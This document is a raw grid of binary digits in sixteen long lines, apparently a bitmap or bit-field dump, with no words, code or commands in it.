+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000010000000000000000000000000110000000000000000000000000000000000000000000000000000000000000000000000000000000000000001110110101101001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001010101000011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101110101001100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111000101011000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001010000000001111000000000000000000000000000001100000000000001010000000000110000000000000010000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000100001011010100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010001000000000000000000000000000100100000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111100111000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000001000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000001110001101100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101000011001110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000011000000000000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111100001110000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000001100011100010011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001010111101111001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000001110011011001011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 